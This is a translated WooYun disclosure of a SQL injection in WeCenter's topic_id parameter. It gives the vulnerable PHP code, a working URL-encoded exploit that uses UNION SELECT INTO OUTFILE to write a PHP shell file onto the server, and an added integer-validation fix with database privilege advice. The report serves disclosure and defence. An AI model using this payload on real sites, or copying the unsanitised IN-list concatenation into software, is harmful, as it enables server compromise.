Vulnerability Summary

Bug ID: WooYun-2015-106369

Title: WeCenter SQL injection (ROOT SHELL)

Vendor: anwsion.com

Author: 路人甲

Submitted: 2015-04-09 12:49

Disclosed: 2015-07-12 15:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org

Tags: None


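Vulnerability Details

Disclosure status:

2015-04-09: Details reported to the vendor; awaiting vendor response
2015-04-13: Vendor confirmed; details visible to the vendor only
2015-04-16: Details opened to third-party security partners
2015-06-07: Details opened to core white hats and domain experts
2015-06-17: Details opened to regular white hats
2015-06-27: Details opened to intern white hats
2015-07-12: Details opened to the public

Brief description:

WeCenter SQL injection (ROOT SHELL)

Detailed description: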

ajax.php:
public function question_list_action()
{
    if ($_GET['feature_id'])
    {
        if ($topic_ids = $this->model('feature')->get_topics_by_feature_id($_GET['feature_id']))
        {
            $_GET['topic_id'] = implode(',', $topic_ids);
        }
    }
    switch ($_GET['type'])
    {
        case 'best':
            // $_GET['topic_id'] is handed to the model without any validation
            $action_list = $this->model('topic')->get_topic_best_answer_action_list($_GET['topic_id'], $this->user_id, intval($_GET['page']) * get_setting('contents_per_page') . ', ' . get_setting('contents_per_page'));
            // ...


topic.php:
public function get_topic_best_answer_action_list($topic_ids, $uid, $limit)
{
    $cache_key = 'topic_best_answer_action_list_' . md5($topic_ids . $limit);
    if (!$result = AWS_APP::cache()->get($cache_key))
    {
        // Prints the WHERE clause that is about to be executed
        echo " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'";
        // explode() followed by implode() returns $topic_ids unchanged, so the
        // request value is concatenated into the IN (...) list as-is
        if ($topic_relation = $this->query_all("SELECT item_id FROM " . $this->get_table('topic_relation') . " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'"))
        // ...


ROOT SHELL


url:
http://localhost/WeCenter/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29%20union%20select%20%27%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%27%20into%20outfile%20%27D%3A%2fshell.php%27%23
A shell is then created on the D: drive.

Proof of vulnerability:

Fix:
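
An added example, not part of the original report and not WeCenter's code: one way to close the injection shown in get_topic_best_answer_action_list() is to accept only decimal integers in the topic_id list before it reaches the IN (...) clause. The function names in_list_vulnerable and in_list_hardened, the length and count limits, and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example; function names and limits are hypothetical, not WeCenter's.

// What the expression in topic.php does: explode() followed by implode()
// returns the request value unchanged, so it adds no filtering at all.
function in_list_vulnerable(string $topic_ids): string
{
    return implode(',', explode(',', $topic_ids));
}

// Hardened form: every token must consist of decimal digits only.
// Returns a normalised "1,2,3" string, or null if the request must be rejected.
function in_list_hardened(string $topic_ids, int $max = 100): ?string
{
    $ids = [];
    foreach (explode(',', $topic_ids) as $token) {
        $token = trim($token);
        // Reject empty, non-numeric or over-long tokens instead of trimming
        // them silently, so malformed requests stay visible in logs.
        if ($token === '' || strlen($token) > 10 || !ctype_digit($token)) {
            return null;
        }
        $ids[(int) $token] = true; // array key removes duplicates
    }
    if (count($ids) > $max) {
        return null;
    }
    return implode(',', array_keys($ids));
}

// Constructed sample inputs (not taken from a real request log).
$samples = ['3,7,7,12', '5, 9', '', '1) union select 1#'];
foreach ($samples as $raw) {
    $safe = in_list_hardened($raw);
    printf(
        "%-22s vulnerable=[%s] hardened=%s\n",
        var_export($raw, true),
        in_list_vulnerable($raw),
        $safe === null ? 'REJECTED' : "[$safe]"
    );
}
```

Independently of the code fix, MySQL only honours INTO OUTFILE when the connecting account holds the FILE privilege and secure_file_priv permits the target directory, so the application's database account should not be root and should not have FILE.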

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-04-13 15:01

Vendor reply:

Thanks for the heads-up! Much appreciated!!

Latest status:

None

